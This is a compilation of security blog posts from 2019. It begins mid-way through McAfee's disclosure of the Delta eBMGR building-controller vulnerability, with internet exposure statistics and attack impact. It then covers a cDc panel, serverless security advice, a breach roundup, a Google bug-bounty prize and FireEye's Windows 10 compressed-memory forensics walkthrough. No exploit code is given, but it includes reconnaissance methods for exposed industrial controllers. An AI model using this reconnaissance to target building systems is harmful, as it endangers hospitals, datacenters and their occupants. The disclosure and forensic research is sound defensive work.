As of early April 2019, 492 eBMGR devices remained reachable via internet-wide scans using Shodan. Of those found, a portion are almost certainly honeypots based on user-applied tags found in the Shodan data, leaving 404 potentially vulnerable victims. If we include other Delta Controls devices using the same firmware and assume a high likelihood they are vulnerable to the same exploit, the total number of potential targets balloons to over 1600. We tracked 119 new internet-connected eBMGR devices since February 2019; however, these were outpaced by the 216 devices that have subsequently gone offline. We believe this is a combination of ICS systems administrators following the standard practice of taking these devices off the public Internet, coupled with a strategy by the vendor (Delta Controls) of proactively reaching out to customers to reduce the internet-connected footprint of the vulnerable devices. Most controllers appear to be in North America, with the US accounting for 53% of online devices and Canada accounting for 35%. It is worth noting that in some cases the IP address, and hence the geographic location of the device from Shodan, is traced back to an ISP (Internet Service Provider), which could result in skewed findings for locations.
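The arithmetic behind those figures, for easy reference (all numbers come from the scan data above):

```python
reachable = 492                         # eBMGRs visible in early April 2019
likely_victims = 404                    # after discarding tagged honeypots
honeypots = reachable - likely_victims  # devices carrying honeypot tags

newly_online, gone_offline = 119, 216   # churn since February 2019
net_change = newly_online - gone_offline

assert honeypots == 88
assert net_change == -97                # the exposed footprint shrank overall
```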

Some industries seem more at risk than others given the accessibility of devices. We were only able to map a small portion of these devices to specific industries, but the top three categories we found were Education, Telecommunications, and Real Estate. Education included everything from elementary schools to universities. In academic settings, the devices were sometimes deployed district-wide, in numerous facilities across multiple campuses. One example is a public-school system in Canada where each school building in the district had an accessible device.  The telecommunications category was composed entirely of ISPs and/or phone companies; many of these could be due to the ISP being listed as the service provider. The real estate category generally included office and apartment buildings. From available metadata in the search results, we also managed to find instances of education, healthcare, government, food, hospitality, real estate, child care and financial institutions using the vulnerable product.

With a bit more digging, we were easily able to find other targets through publicly available information. While it is not common practice to post sensitive documents online, we found many documents available that indicate these devices are used as part of a company’s building automation plans. This was particularly true for government buildings, where solicitations for proposals are issued to build the required infrastructure. All in all, we have collected around 20 documents that include detailed proposals, requirements, pricing, engineering diagrams, and other information useful for reconnaissance. One particular government building had a 48-page manual that included internal network settings of the devices, control diagrams, and even device locations.

Redacted network diagram found on the Internet specifying ICS buildout

What does it matter if an attacker can turn on and off someone’s AC or heat?  Consider some of the industries we found that could be impacted. Industries such as hospitals, government, and telecommunications may face severe consequences when these systems malfunction. For example, the eBMGR is used to maintain positive/negative pressure rooms in medical facilities or hospitals, where the slightest change in pressurization could have a life-threatening impact due to the spread of airborne diseases.  Suppose instead a datacenter was targeted. Datacenters need to be kept at a cool temperature to ensure they do not overheat. If an attacker were to gain access to the vulnerable controller and use it to raise heat to critical levels and disable alarms, the result could be physical damage to the server hardware en masse, as well as downtime costs, not to mention potential permanent loss of critical data.  According to the Ponemon Institute (https://www.ponemon.org/library/2016-cost-of-data-center-outages), the average cost of a datacenter outage was as high as $740,357 in 2016 and climbing. Microsoft was a prime example of this; in 2018, the company suffered a massive datacenter outage (https://devblogs.microsoft.com/devopsservice/?p=17485) due to a cooling failure, which impacted services for around 22 hours.

To show the impact beyond LED lights flashing, McAfee’s ATR contracted a local Delta installer to build a small datacenter simulation with a working Delta system. This includes both heating and cooling elements to show the impact of an attack in a true HVAC system. In this demonstration we show both normal functionality of the target system, as well as the full attack chain, end-to-end, by raising the temperature to dangerous levels, disabling critical alarms and even faking the controller into thinking it is operating normally. The video below shows how this simple unpatched vulnerability could have devastating impact on real systems.

We also leverage this demo system, now located in our Hillsboro research lab, to highlight how an effective patch, in this case provided by Delta Controls, is used to immediately mitigate the vulnerability, which is ultimately our end goal of this research project.

Conclusion

Discoveries such as CVE-2019-9569 underline the importance of secure coding practices on all devices. ICS devices such as this Delta building manager control critical systems which have the potential to cause harm to businesses and people if not properly secured.

There are some best practices and recommendations related to the security of products falling into nonstandard environments such as industrial controls. Based on the nature of the devices, they may not have the same visibility and process control as standard infrastructure such as web servers, endpoints and networking equipment. As a result, industrial control hardware like the eBMGR PLC may be overlooked from various angles including network or Internet exposure, vulnerability assessment and patch management, asset inventory, and even access controls or configuration reviews. For example, a principle of least privilege policy may be appropriate, and network isolation or a protected network segment may help provide boundaries of access to adversaries. An awareness of security research and an appropriate patching strategy can minimize exposure time for known vulnerabilities. We recommend a thorough review and validation of each of these important security tenets to bring these critical assets under the same scrutiny as other infrastructure.

One goal of the McAfee Advanced Threat Research team is to identify and illuminate a broad spectrum of threats in today’s complex and constantly evolving landscape. As per McAfee’s vulnerability public disclosure policy, McAfee’s ATR informed and worked directly with the Delta Controls team.  This partnership resulted in the vendor releasing a firmware update which effectively mitigates the vulnerability detailed in this blog, ultimately providing Delta Controls’ consumers with a way to protect themselves from this attack. We strongly recommend any businesses using the vulnerable firmware version (571848 or prior) update as soon as possible in line with your patch policy and testing strategy. Of special importance are those systems which are Internet-facing. McAfee customers are protected via the following signature, released on August 6th: McAfee Network Security Platform 0x45d43f00 BACNET: Delta enteliBUS Manager (eBMGR) Remote Code Execution Vulnerability.

We’d like to take a minute to recognize the outstanding efforts from the Delta Controls team, which should serve as a poster-child for vendor/researcher relationships and the ability to navigate the unique challenges of responsible disclosure.  We are thrilled to be collaborating with Delta, who have embraced the power of security research and public disclosure for both their products as well as the common good of the industry. Please refer to the following statement from Delta Controls which provides insight into the collaboration with McAfee and the power of responsible disclosure.

The post HVACking: Understanding the Delta Between Security and Reality appeared first on McAfee Blogs.

Live From Black Hat USA: Making Big Things Better the Dead Cow Way

When Reuters’ investigative reporter Joseph Menn confirmed that presidential candidate Beto O’Rourke was an early member of The Cult of the Dead Cow (cDc), it seemed as though folks had two viewpoints on it. They either had more respect for him because they understood what cDc was trying to accomplish, or they were relatively horrified because “hackers are bad.” It’s easy to fear what we don’t understand, and what is often shed in a bad light.

In InfoSec, we know and understand that hackers are not inherently bad. Many of them are hacktivists looking to make positive change in the world. During the Black Hat panel discussion, “Making Big Things Better the Dead Cow Way,” Menn talked about how O’Rourke was 14 or 15 years old when he joined the cDc and left before the organization grew in notoriety, and how he interviewed a neo-Nazi in Texas and proceeded to let him hang himself with his own words. Even at that young age, he was all about diversity and engagement, especially within the cDc.

Mudge Zatko, a prominent member of L0pht and the cDc, who went on to be a program manager at DARPA, shared what he thought stood out most about O’Rourke, saying, “You can form groups online, but when you get together and meet the person, are they who you thought? You met [Beto] and he was a very friendly guy.”

This story matters because in order to make change, you have to understand where your power and influence lie to have the best results. For O’Rourke, that looks like running for president. For the cDc, it was acknowledging that hackers have power and influence. With the understanding that computers and encryption could be leveraged to help human rights efforts, the group made a more public move toward hacktivism.

“What can you do to make the world a better place? How do we leverage this power? Use that to go through the media, and hopefully through some sort of technology, but especially through our connections to the media and use the influence of our long history,” said Mudge.

While Veracode co-founder Christien Rioux, aka Dildog, opted to work with the private sector to tackle security issues at wide scale by creating the technology that would become static binary analysis and Veracode, there are many who opt to take more of a hacktivist approach. As with anything else, there are varying views on what hacktivism is and what it isn’t, which parallels debates about what human rights truly encompass.

“What is your definition of human rights? Just governmental interaction because of civil liberties, or is it applicable to private organizations?” asks Luke Benfey (aka Deth Veggie). “Some believe it is and some believe it isn't. There are philosophical disagreements about what is ethically valid. Some believe that DDoS or web defacement is not applicable as a legitimate means of protest, and others believe it is a legitimate means of protest. These are things that are still going on, and I don't necessarily think that the kinds of hacktivism have changed radically, so much as scale has changed; the Internet and access to it have spread much more widely around the world.”

With broader access comes broader awareness and even broader responsibility: once something is seen it can’t be unseen. While we certainly see malicious cyberattacks making headlines, a lot of good is being done by the hacktivist community as well. Just look to discussions around coordinated disclosure and the ways in which security researchers are working with private and public organizations to make them – and all of us – safer.

If you’re looking for something to do, and want real proof of the cDc’s hacktivist ethos, we were told that if you search the website of the International Criminal Tribunal for the former Yugoslavia for cDc in the case files pertaining to former Yugoslav president Slobodan Milosevic’s trial for war crimes, you’ll see that they pop up a lot for their work helping prosecutors.

Or you could just watch this video Q&A where Veracode Co-Founder Chris Wysopal (@WeldPond) interviews Menn, Rioux, and Deth Veggie about the cDc and Menn’s book, “Cult of the Dead Cow: How the Original Hacking Supergroup Might Just Save the World” at this year’s Black Hat.

Serverless Security: Best Practices to Secure your Serverless Infrastructure

According to a study by LogicMonitor, the share of applications hosted on-premises will decrease by 10 percentage points, to 27%, by 2020. In comparison, the share of cloud-native, and more specifically serverless, hosted applications, on platforms like AWS Lambda, Google Cloud and Microsoft Azure, will increase to 41%.

The trend to cloud, specifically serverless, and away from on-prem is not new and comes as no surprise, as serverless hosted applications provide developers with a faster speed to market and allow them to release new functionality more frequently. In addition, serverless can save organizations bundles in infrastructure costs. It has, however, left DevSecOps and security teams in a quandary: while they don’t want to impede development efforts, they are left with no choice but to place the security of serverless applications in someone else’s hands.

To alleviate this issue, there are several serverless security best practices that should be put in place to properly secure the serverless applications developers launch.

Serverless Security Best Practices

Don’t rely solely on WAF protection: Application-layer firewalls are only capable of inspecting HTTP(S) traffic. This means that a WAF will only protect API Gateway-triggered functions; it will not provide protection against any other event trigger types. A WAF will not help if your functions are triggered from different event sources, such as:

  • Cloud storage events (e.g. AWS S3, Azure Blob storage, Google Cloud Storage)
  • Stream data processing (e.g. AWS Kinesis)
  • Database changes (e.g. AWS DynamoDB, Azure CosmosDB)
  • Code modifications (e.g. AWS CodeCommit)
  • Notifications (e.g., SMS, Emails, IoT)

Having a WAF in place is still important, but it is not and should not be the only line of defense in securing serverless applications. Relying solely on a WAF leaves many gaping security holes.

Customize Function Permissions: 90% of permissions in serverless applications are found to be over-permissive. While setting up permissions feels like a daunting task at the function level in serverless, a one-size-fits-all approach is not a solution. Setting policies that are larger and more permissive than a function needs is a common serverless security mistake, and failing to minimize individual function roles and permissions makes your attack surface larger than necessary. Creating proper function-level permissions requires DevSecOps teams to sit down with the developers who wrote the functions and review what each function does. Only after determining what each function actually needs to do can a unique role for each function and a suitable permission policy be created. Luckily, there are tools available to help automate this process for heightened AWS Lambda security, as well as on other cloud-native platforms.
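As an illustration of that review step, here is a minimal sketch that flags over-permissive statements; the policy shape follows AWS IAM’s JSON format, but the example policy and the wildcard heuristic are our own:

```python
import json

def over_permissive(policy):
    """Return the statements that grant wildcard actions or resources."""
    flags = []
    for stmt in policy.get("Statement", []):
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = stmt.get("Resource", [])
        resources = [resources] if isinstance(resources, str) else resources
        if any("*" in a for a in actions) or "*" in resources:
            flags.append(stmt)
    return flags

# A made-up role policy that grants far more than one function needs:
policy = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": "dynamodb:*", "Resource": "*"}
  ]
}""")
assert len(over_permissive(policy)) == 1
```

A real review would go further, comparing granted actions against what the function’s code actually calls, but even this crude wildcard check catches the most common mistake.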

Conduct a Code Audit: Black Duck Software conducted an audit of 1,000 commonly-used applications in enterprises and found that 96% utilized open-source software. Furthermore, their researchers found that 60% of that software contained security vulnerabilities, and some of the bugs were more than four years old. This makes code ownership and authenticity a critical security risk, as can you really trust what isn’t yours?

In an approach referred to as “poisoning the well,” attackers aim to gain long-term persistence in your application by means of an upstream attack. Cloud-native applications tend to be composed of many modules and libraries, and those modules often include many other modules, so it’s not uncommon for a single serverless function to include tens of thousands of lines of code from various external sources, even when your developers wrote fewer than 100 lines themselves. Attackers look to include their malicious code in common projects. After poisoning the well, they patiently wait as the new version makes its way into your cloud applications. To enhance serverless security on AWS, as well as Microsoft Azure, Google Cloud Functions, etc., it is important to conduct a security audit of the code or look for tooling that can automate the process, scanning for vulnerabilities as a serverless security best practice.

Retain Control Over Your Functions: This may sound like a utopian dream, but code vulnerabilities can be mitigated through careful CI/CD. Malicious functions can slip in through a variety of means, such as being deployed by a rogue employee. Additionally, developer workstations, rather than the deployed apps themselves, can be targets for attackers, enabling them to deploy malicious functions through legitimate channels. Such functions could sneak in and wreak havoc, undetected. To offset this risk, create a policy and strategy for performing code analysis at build time, before code reaches runtime, and make sure every function goes through CI/CD.

Look at All Attack Indicators: Visibility gets harder with serverless. The shift to serverless significantly increases the total amount of information and the number of resources, which hinders DevSecOps and security teams’ ability to make sense of all the data. As the number of functions increases, it becomes even more difficult to determine whether everything is behaving the way it’s supposed to. Case in point: only a few hundred functions can generate billions of log events per day, making it difficult to know which ones matter. Even if you are familiar with the attack patterns unique to serverless apps, visually scanning them all simply can’t be done, so leverage AI tools for added serverless security visibility and efficiency.
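To make the scale problem concrete, here is a toy sketch of the kind of per-function baseline an automated tool maintains (the function names and counts are invented): anything far above its own baseline gets flagged, instead of a human eyeballing billions of events.

```python
from collections import Counter

# Invented per-function event counts, for illustration only.
baseline = Counter({"checkout": 1_000, "thumbnailer": 5_000})
today = Counter({"checkout": 1_050, "thumbnailer": 90_000})

def outliers(baseline: Counter, today: Counter, factor: float = 10.0) -> list[str]:
    """Flag functions whose event volume exceeds their baseline by `factor`."""
    return [fn for fn in today if today[fn] > factor * baseline.get(fn, 1)]
```

Real tooling is of course far more sophisticated (sequence and behavior analysis, not just volume), but the principle is the same: the machine narrows billions of events down to the handful worth a human’s attention.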

Time Out Your Functions: Functions should have a tight runtime profile. Admittedly, crafting appropriate serverless function timeouts is often not intuitive; the maximum duration can be quite specific to each function. DevSecOps teams must consider the configured timeout versus the time a function actually needs. Many developers set the timeout to the maximum allowed, since the unused time doesn’t create an additional expense. However, this approach creates an enormous security risk: if an attacker succeeds with a code injection, they have more time available to do more damage. Shorter timeouts force them to attack more often, in what we refer to as a “Groundhog Day” attack, but that also makes the attack more visible. As a serverless security best practice, shrink not just what a function can do, but how long it can run.

In conclusion, despite the new security challenges, serverless deployments are great for organizations of all sizes, providing developers with speed to launch and improving operational costs and efficiencies. Serverless also creates an opportunity to adopt an even stronger security posture, since everything operates at the function level, making life more difficult for attackers. To embrace this opportunity, teams must change their approach to application security in serverless deployments. Securing serverless apps requires a variety of tools and tactics, including collaboration between the people who build the application and those who secure it.

The post Serverless Security: Best Practices to Secure your Serverless Infrastructure appeared first on CyberDB.

Cyber Security Roundup for July 2019

July was a month of mega data privacy fines. The UK Information Commissioner's Office (ICO) announced it intended to fine British Airways £183 million for last September's data breach, in which half a million BA customer personal records were compromised. The ICO also announced a £100 million fine for US-based Marriott Hotels after the hotel chain said 339 million guest personal data records had been compromised by hackers. Those fines were dwarfed on the other side of the pond, with Facebook agreeing to pay a US Federal Trade Commission (FTC) fine of $5 billion to put the Cambridge Analytica privacy scandal to bed, and Equifax paying $700 million to the FTC to settle its 2017 data breach, which involved the loss of at least 147 million personal records. Big numbers indeed: we are seeing the big stick of the GDPR kicking in within the UK, and the FTC flexing some serious privacy-rights protection muscles in the US. All 'food for thought' when performing cybersecurity risk assessments.

Through a Freedom of Information request, the UK Financial Conduct Authority (FCA) disclosed a sharp rise of over 1,000% in cyber incidents within the UK financial sector in 2018. In my view, this rise was fuelled by the mandatory data breach reporting requirement of the GDPR, which came into force in May 2018. I also think the finance sector was reluctant to report security weaknesses pre-GDPR, over fears of damaging customer trust. Would you trust and use a bank if you knew its customers were regularly hit by fraud?

Eurofins Scientific, the UK's largest forensic services provider, which was taken down by a mass ransomware attack last month, paid the cybercrooks' ransom, according to BBC News. It wasn't disclosed how much Eurofins paid, but the payment of large ransoms is highly concerning, as it fuels further ransomware attacks.

A man was arrested on suspicion of carrying out a cyberattack against Lancaster University. The UK National Crime Agency said the university had been compromised and "a very small number" of student records, phone numbers and ID documents were accessed. In contrast, the FBI arrested a 33-year-old software engineer from Seattle; she is alleged to have taken advantage of a misconfigured web application firewall to steal a massive 106 million personal records from Capital One. A stark reminder of the danger of misconfiguring and mismanaging IT security components.

The Huawei international political rhetoric and bun fighting has gone into retreat. UK MPs said there were no technological grounds for a complete Huawei ban, while Huawei said it was 'confident' the UK would choose to include it within 5G infrastructure. Even the White House said it would start to relax the United States' Huawei ban. It seems something behind the scenes has changed; this reversal in direction is more likely to be financially motivated than security motivated, in my rather cynical view.

A typically busy month for security patch releases, with Microsoft, Adobe and Cisco all releasing the expected barrage of security updates for their products. Apple released security updates as well; however, Google researchers announced six iPhone vulnerabilities, including one that remains unpatched.


Awarding Google Cloud Vulnerability Research



Today, we’re excited to announce a yearly Google Cloud Platform (GCP) VRP Prize to promote security research of GCP. A prize of $100,000.00 will be paid to the reporter of the best vulnerability affecting GCP reported through our Vulnerability Reward Program (g.co/vulnz) and having a public write-up (nominations will be received here).

We’ve received vulnerability reports for various application security flaws in GCP over the years, but we felt research of our Cloud platform has been under-represented in our Vulnerability Reward Program. So, with the GCP VRP Prize, we hope to encourage even more researchers to focus on GCP products and help us identify even more security vulnerabilities.

Note that we will continue to pay hundreds of thousands of dollars to our top bug hunters through our Vulnerability Research Grants Program even when no bugs are found, and to reward up to tens of thousands of dollars per bug to the most impactful findings. This prize is meant to create an additional incentive for more people to focus on public, open security research on GCP who would otherwise not participate in the reward program.

This competition draws on our previous contests, such as Pwnium and the Project Zero Prize. Rather than focusing bug hunters on collecting vulnerabilities for complex bug chains, we are attempting a slightly different twist and selecting a single winner out of all the vulnerabilities we receive. That said, this approach comes with its own challenges, such as defining the right incentives for bug hunters (both in terms of research and their communications with our team when reporting vulnerabilities) and ensuring there are no conflicting incentives when our own team is looking for similar vulnerabilities (since we aren't eligible to collect the prize).

For the rest of the year, we will be seeking feedback from our top bug hunters and the security community to help define what vulnerabilities are the most significant, and we hope we can work together to find the best way to incentivize, recognize, and reward open security research. To further incentivize research in 2019, we will be issuing GCP VRP grants summing up to $100,000 to our top 2018 researchers.

Head over here for the full details on the contest. Note that if you have budget constraints for access to testing environments, you can use the free tier of GCP.

We look forward to our Vulnerability Rewards Programs resulting in even more GCP customer protection in the following years thanks to the hard work of the security research community. Follow us on @GoogleVRP.

Finding Evil in Windows 10 Compressed Memory, Part Three: Automating Undocumented Structure Extraction

This is the final post in the three-part series: Finding Evil in Windows 10 Compressed Memory. In the first post (Volatility and Rekall Tools), the FLARE team introduced updates to both memory forensic toolkits. These updates enabled these open source tools to analyze previously inaccessible compressed data in memory. This research was shared with the community at the 2019 SANS DFIR Austin conference and is available on GitHub (Volatility and Rekall). In the second post (Virtual Store Deep Dive), we looked at the structures and algorithms involved in locating and extracting compressed pages from the Store Manager. The post included a walkthrough of a memory dump designed for analysts to be able to recreate in their own Windows 10 environments. The structures referenced in the walkthrough were all previously analyzed in a disassembler, a manual effort which came in at around eight hours. As you’d expect, this task quickly became a candidate for automation. Our analysis time is now under two minutes!

This final post accompanies the BlackHat USA 2019 talk of the same name that Dimiter Andonov and I presented, and seeks to describe the challenges faced in maintaining software that ultimately relies on undocumented structures. Here we introduce a solution to reduce the level of effort needed to analyze undocumented structures.

Overview

Undocumented structures within the Windows kernel are always subject to change. The flexibility granted by not publicizing a structure’s composition can be invaluable to a development team. It can allow for the system to grow unencumbered by the need to update helper functions and public documentation. In many cases, even when a publicly available API designed to access the undocumented structures can be leveraged on a live system, incident responders and memory forensic analysts don’t have the luxury of utilizing them. DFIR analysts operating on memory extractions or snapshots ultimately rely on tools which must recreate the job of an API by manually parsing and traversing structures and reimplementing the algorithms used.

Unfortunately, these structures and algorithms are not always up to date in the analysts’ toolkit, leading to incomplete extractions or completely broken investigations. These tools may cease to work after any given update. This is the case with the Windows kernel’s Store Manager component. Structures relied on to locate compressed data in RAM are constantly evolving. This requires some flexibility built into the plugins and a means of reducing the analysis time required to reconstruct these structures.

Leveraging flare-emu

To ease my Store Manager analysis efforts, I looked into Tom Bennett’s flare-emu utility. flare-emu can be viewed as the marriage of IDA Pro with the Unicorn emulation engine. The original use of the framework was to clean up Objective-C function call names due to ambiguity stemming from the unknown id argument for calls to objc_msgSend. Tom was able to use emulation to resolve the ambiguity and clean up his analysis environment. The value I saw in the framework was that the barrier to entry for using Unicorn was now lowered to a point where it could be used to rapidly prototype ideas. flare-emu handles PE loading, memory faults, and function calls while guaranteeing traversal over code you would like to reach.

After analyzing a dozen Windows 10 kernels, I had become familiar enough with the process to begin automating the effort. The automation of undocumented structures and algorithms requires one or more of the following properties to remain constant across builds.

  • Structure locations
  • Function prototypes
  • Order of structure memory access
  • Structure field usage
  • Callstacks

Let’s explore the example of locating the offset of ST_DATA_MGR.wCompressionFormat. As shown in Figure 1, this field is the first argument to RtlDecompressBufferEx. This function is publicly available and documented. This is how we originally derived that offset 0x220 in the ST_DATA_MGR structure corresponded to the compression format of the store page in Windows 10 1703 (x86).


Figure 1: Call to RtlDecompressBufferEx; note that the compression format originates from ST_DATA_MGR

To leverage flare-emu in automating the extraction of the value 0x220, we have a few options. For example, from analysis of other kernels, we know that the access to ST_DATA_MGR immediately before decompression is likely to be the compression format. In this case, a stronger extraction algorithm can be leveraged by prepopulating ST_DATA_MGR with a known pattern (see Figure 2).


Figure 2: Known pattern copied into ST_DATA_MGR buffer

Using flare-emu, we emulate the function in which this call is located and examine the stack post-emulation.

0x20101000

0x1163

0x31001200

0x1423

0x20001400

“Km”

Figure 3: Post-emulation stack layout

Knowing that the wCompressionFormat argument originated from the ST_DATA_MGR structure, we see that it is now “Km”. If we were to search for that value in the known pattern, we would find that it begins at offset 0x220. Check out Figure 4 to see how we can leverage flare-emu to solve this challenge.


Figure 4: Code snippet from w10deflate_auto project demonstrating the automation of wCompressionFormat

The decorators preceding the function signify that the extraction algorithm will work on both 32-bit and 64-bit architectures. After generating a known pattern using a helper function within my project, flare-emu is used to allocate a buffer, storing a pointer to it in lp_stdatamgr. The pointer is written into the ECX register because I know that the first argument to the parent function, StDmSinglePageCopy, is the pointer to the ST_DATA_MGR structure. The pHook function populates ECX prior to the emulation run. The helper function locate_call_in_fn is used to perform a relaxed search for RtlDecompressBufferEx within StDmSinglePageCopy. Using flare-emu’s iterate function, I force emulation to reach decompression, at which point I read the first item on the stack and then search for it within my known pattern.
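The known-pattern trick itself is easy to reproduce outside the emulator. Here is a minimal sketch (the encoding scheme is our own illustration, not flare-emu's): fill a structure-sized buffer with words that encode their own offset, then map any value observed after emulation back to the field it came from.

```python
import struct

def known_pattern(size: int) -> bytes:
    # Each little-endian 16-bit word stores its own offset, so any 2-byte
    # value read back out of the buffer identifies the field it came from.
    return b"".join(struct.pack("<H", off) for off in range(0, size, 2))

def field_offset(observed: bytes, pattern: bytes) -> int:
    # Map a value seen on the post-emulation stack back to a field offset.
    return pattern.find(observed)

buf = known_pattern(0x400)       # stand-in for the ST_DATA_MGR buffer
observed = buf[0x220:0x222]      # stand-in for the value read off the stack
```

With this scheme, recovering `field_offset(observed, buf)` yields 0x220, mirroring how the "Km" value on the stack pinpointed wCompressionFormat.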

Techniques like the one described above are ultimately used to retrieve all structure fields involved in the page decompression and can be leveraged in other situations in which an undocumented structure may need tracking across Windows builds. Figure 5 shows the automation utility extracting the fields of the undocumented structures used by the Volatility and Rekall plugins.


Figure 5: Output of automation from within IDA Pro

Keeping Volatility and Rekall Updated

The data generated by the automation script is primarily useful when implemented in Volatility and Rekall. In both Volatility and Rekall, the win10_memcompression.py overlay contains all structure definitions needed for page location and decompression. Figure 6 shows a snippet from the file in which the Windows 10 1903 x86 profile is created.


Figure 6: Structure definition found within w10_memcompression.py overlay

Create a new profile dictionary (ex. win10_mem_comp_x86_1903) corresponding to the Windows build that you are targeting and populate the structure entries accordingly.
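A hedged sketch of the shape such an entry might take (the dictionary layout and every offset below are placeholders to be replaced with the automation output; this is not the overlay's actual schema):

```python
# Hypothetical profile entry for a new Windows build; all offsets are
# placeholders, to be filled from the automation script's output.
win10_mem_comp_x86_1903 = {
    "ST_DATA_MGR": {
        "wCompressionFormat": 0x220,  # placeholder offset
        "dwRegionIndexMask": 0x110,   # placeholder offset
        "dwRegionSizeMask": 0x114,    # placeholder offset
    },
}
```

The point is only that each supported build gets its own dictionary of structure-to-offset mappings, keyed the same way as the existing profiles.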

Conclusion

Undocumented structures pose a challenge to those who rely on them. This blog post covered how flare-emu can be leveraged to reduce the level of effort needed to analyze new files. We analyzed the extraction of an ST_DATA_MGR field used in page decompression by presenting the problem and then the code involved with automating the effort. The automation code is available on the FireEye GitHub with usage information and documentation available in both the README and code.

Finding Evil in Windows 10 Compressed Memory, Part Two: Virtual Store Deep Dive

Introduction

This blog post is the second in a three-part series covering our Windows 10 memory forensics research and it coincides with our BlackHat USA 2019 presentation. In Part One of the series, we covered the integration of the research in both the Volatility and Rekall memory forensics tools. We demonstrated that forensic artifacts (including reflectively loaded malware) could remain undiscovered without the FLARE research integration on Windows 10 (available on GitHub at win10_volatility and win10_rekall).

In this post, we demonstrate how to retrieve a compressed page using the structures and algorithms described in our white paper. We track down a compressed page in memory, beginning at its virtual address within a known process. A WinDbg kernel debugger setup is used in this walkthrough, but a similar process could be followed from within a memory snapshot or extraction using Volatility or Rekall.

Finding a Compressed Page

The operating system used in this demo is Windows 10.0.15063.0 (x64) and the structure definitions shown will be applicable across any 1703 build. Note that the two global offsets nt!SmGlobals and nt!MmPagingFile will need to be located for each revision. The process of retrieving these global offsets is described further in our white paper.

To begin analysis, we create a marker page and flush it to the Virtual Store. This can be done in several ways, the easiest of which is allocating memory in a memory constrained virtual machine.  A simple utility (ram_eater.exe) was created to perform this task. The ram_eater utility allocates and writes a marker page, and then repeatedly allocates more memory in user-specified page amounts. In a memory constrained virtual machine (1 GB RAM), the marker page will become stale shortly and be evicted to the virtual store. In Figure 1, ram_eater reports that it has allocated the marker page at address 0x2a368480000. The marker page we used (see Figure 2) was a string beginning with “CC WAS HERE!”.


Figure 1: Allocating a marker page using ram_eater_x64.exe

We can verify the contents of our marker page by locating it in the kernel debugger, viewing its Page Table Entry (PTE) and dumping its corresponding physical memory (see Figure 2). We use the !process extension to locate ram_eater’s EPROCESS structure and switch into the context of the ram_eater process. This ensures that we traverse the correct process-specific page tables for the ram_eater process. Using the page frame number (pfn) described by the hardware PTE, we dump the physical memory to validate the contents of our marker page. Page frame numbers do not include the low-order bits used to specify an offset into a page, therefore they must be multiplied by PAGE_SIZE (0x1000) to identify the actual address of the data.


Figure 2: Locating and viewing the marker page from the kernel debugger
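The page-frame-number arithmetic mentioned above is simple to sketch:

```python
PAGE_SIZE = 0x1000  # 4 KiB pages on x64 Windows

def pfn_to_physical(pfn: int, page_offset: int = 0) -> int:
    """Translate a page frame number (plus an optional offset into the
    page) into the physical address a kernel debugger can dump."""
    assert 0 <= page_offset < PAGE_SIZE
    return pfn * PAGE_SIZE + page_offset

# e.g. PFN 0x1ad0b corresponds to physical address 0x1ad0b000
```

The specific PFN values here are illustrative; the one to use comes from the hardware PTE located in the previous step.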

After allocating additional memory using ram_eater, we check whether the marker page has been sent to the virtual store. Each entry in the output of the !vm extension can be treated as an index into nt!MmPagingFile (see Figure 3).


Figure 3: PTE of a compressed page in the virtual store and confirmation of the virtual store’s PageFile index

In the PTE displayed in Figure 3, the PageFile index (MMPTE_SOFTWARE.PageFileLow) is 2 and corresponds to the “No Name for Paging File” entry in the !vm extension’s output. From general observation, we know that on a default Windows configuration, the last entry corresponds to the virtual store. It is possible to configure systems with more than a single PageFile on disk, so do not assume that PageFile index 2 will always correlate to the virtual store.

A more thorough option to validate page file indices is to disassemble nt!MmStoreCheckPagefiles. This function contains references to two global variables, the number of active PageFiles, as well as an array of pointers to each nt!_MMPAGING_FILE structure (see Figure 4). We use the PageFile structure’s newly introduced VirtualStorePagefile field to confirm if the PageFile represents a virtual store.


Figure 4: Locating nt!MmPagingFile in WinDbg and dumping system’s nt!_MMPAGING_FILE structures

Having confirmed that the marker page is in the virtual store, the next step is to calculate the Store Manager Page Key (SM_PAGE_KEY), as it serves as a pseudo-handle to locate the decompressed page. Our white paper details the process used to calculate the SM_PAGE_KEY, which turns out to be 0x201a3061 for this example. Note that we will not use the PTE’s swizzle bit in the page key calculations, since the OS build is below 1803. To begin page retrieval, the pointer to the Store Manager’s global structure, nt!SmGlobals, needs to be located. This is a straightforward process if symbols are available (see Figure 5).


Figure 5: Dumping nt!SmGlobals

The first thing to observe is that both SMKM_STORE_MGR and SMKM are located at offset 0x0, directly at nt!SmGlobals. As a raw memory dump, nt!SmGlobals appears to be an array of pointers, but it is better viewed as a two-dimensional (32x32) array of SMKM_STORE_METADATA elements: each pointer in the top-level array points to an array of 32 SMKM_STORE_METADATA structures, and each SMKM_STORE_METADATA structure represents a store. To locate our SM_PAGE_KEY’s corresponding store, we need to find the store index associated with the page key inside the SMKM_STORE_MGR.sGlobalTree B+tree container. The store index is a compound value that yields both indices needed to select the particular SMKM_STORE_METADATA element. Let’s traverse the SMKM_STORE_MGR’s global B+tree (Figure 6). Recall that we are interested in a store manager page key value of 0x201a3061.


Figure 6: Traversing the global B+tree

Now that we have the store index (obtained from the SMKM_FRONTEND_ENTRY structure), we calculate both indices to select the correct SMKM_STORE_METADATA structure for our SM_PAGE_KEY. The index into the pointer array is the result of dividing the retrieved store index by 32, while the second index is the remainder of that division. In our case both indices are 0, selecting the first of the 1,024 stores on the system, which is reserved for legacy applications. Universal Windows Platform (UWP) applications, on the other hand, are placed in stores 1 through 1023. Now, with the SMKM_STORE_METADATA known, we examine the store’s SMKM_STORE structure, as shown in Figure 7.


Figure 7: Dumping the SMKM_STORE structure
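The divide-and-remainder selection described above can be sketched as:

```python
def select_store_metadata(store_index: int) -> tuple[int, int]:
    """Split the compound store index into the two indices used to pick
    an SMKM_STORE_METADATA entry out of the 32x32 structure at nt!SmGlobals."""
    outer = store_index // 32  # which pointer in the top-level array
    inner = store_index % 32   # which of that array's 32 metadata entries
    return outer, inner

# Store index 0 (legacy applications) selects element (0, 0);
# a hypothetical UWP store index of 40 would select (1, 8).
```

The store index values other than 0 here are illustrative; the real one comes from the SMKM_FRONTEND_ENTRY located by the B+tree traversal.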

Once we have our SMKM_STORE structure we traverse another B+tree that associates our SM_PAGE_KEY (0x201a3061) with a chunk key. The chunk key is a compound value and once decoded points to a specific page record inside SMHP_CHUNK_METADATA's two-dimensional aChunkPointer array. The B+tree traversal is shown in Figure 8.


